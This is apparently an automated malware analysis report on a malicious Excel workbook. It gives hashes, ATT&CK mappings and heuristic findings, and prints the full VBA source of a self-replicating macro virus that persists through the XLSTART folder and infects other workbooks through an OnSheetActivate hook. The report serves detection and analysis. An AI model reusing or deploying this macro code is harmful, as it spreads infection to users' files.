Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 89c3a8c6791b19b6…

MALICIOUS

Office (OOXML) / .XLSX

Size: 164.1 KB
Created: 2024-07-02 02:19:41 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-27

MD5: 390a5a4a3a65561718b494958944a289
SHA-1: 53826e9e89b56c59484ee7a26e9010c837671b1c
SHA-256: 89c3a8c6791b19b6d558290d950aeee99481b04c468d4a78e9aa8d5d806b599a

Risk Score: 126

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1071.001 Web Protocols

The sample contains VBA macros, including an Auto_Open subroutine, which is a common technique for malicious macro execution. The script copies itself to the Excel startup folder, establishing persistence. It also attempts to infect other workbooks by copying itself into them via an OnSheetActivate hook, indicating a spreading mechanism.

Heuristics (7)

  • VBA project inside OOXML [medium] (3 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA copies the workbook into the Excel XLSTART startup folder [high] OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
        ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook [high] OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
        Application.OnSheetActivate = "check_files"
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
        Sub auto_open()
  • External hyperlinks (14) [low] OOXML_EXTERNAL_HYPERLINKS
    Document contains 14 external hyperlinks — clickable URLs are stored as external relationships. First target: ../3.TROUBLE NOTE/GHI CHÉP SỰ CỐ ( (LR・組立).xlsx
  • Hidden worksheet (veryHidden) [low] OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
        URL: http://www.w3.org/2000/svg (Document hyperlink)
        URL: http://www.w3.org/1999/xlink (Document hyperlink)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 3007 bytes
  SHA-256: d06f39d184143cb0c8b0b8f949c31f2e3c6239f1bc9808f625dfef74688dd42a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Today_Click()
o_f_a = Cells(30, 2)      'open file adress???????????????
o_f_n = Cells(31, 2)     'open file name????????????
Workbooks.Open FileName:=o_f_a & o_f_n

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Sub Today()
o_f_a = Cells(30, 2)      'open file adress???????????????
o_f_n = Cells(31, 2)     'open file name????????????
Workbooks.Open FileName:=o_f_a & o_f_n

End Sub

Attribute VB_Name = "foxz"

'donwload NEG!!! NoMercyExcelGenerator form NoMercyPage!
'foxz@usa.net


Sub auto_open()
Attribute auto_open.VB_Description = "\n\n \n\n\n�\n"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_Description = "\n\n \n\n\n�\n"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "NEGS.XLS")
    If m$ = "NEGS.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("foxz").Visible = True
    Sheets("foxz").Select
    Sheets("foxz").Copy
    With ActiveWorkbook
        .title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = "infected by NEG Promo!"
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "NEGS.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("foxz").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "NEGS.XLS!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "foxz" Then
                Workbooks("NEGS.XLS").Sheets("foxz").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("foxz").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "NEGS.XLS!check_files"
    Case Else
End Select
End Sub

Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 22528 bytes
  SHA-256: 44c90648e68f8c28b9722b7bb3b244b393e88e944165534d7da81fbccadf19ee

Filename: emf_00.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: xl/media/image1.emf
  Size: 2672 bytes
  SHA-256: ebff33035a2e5d49a440e772bb0124f6173161310960c8a90c6bcbbacfd266a1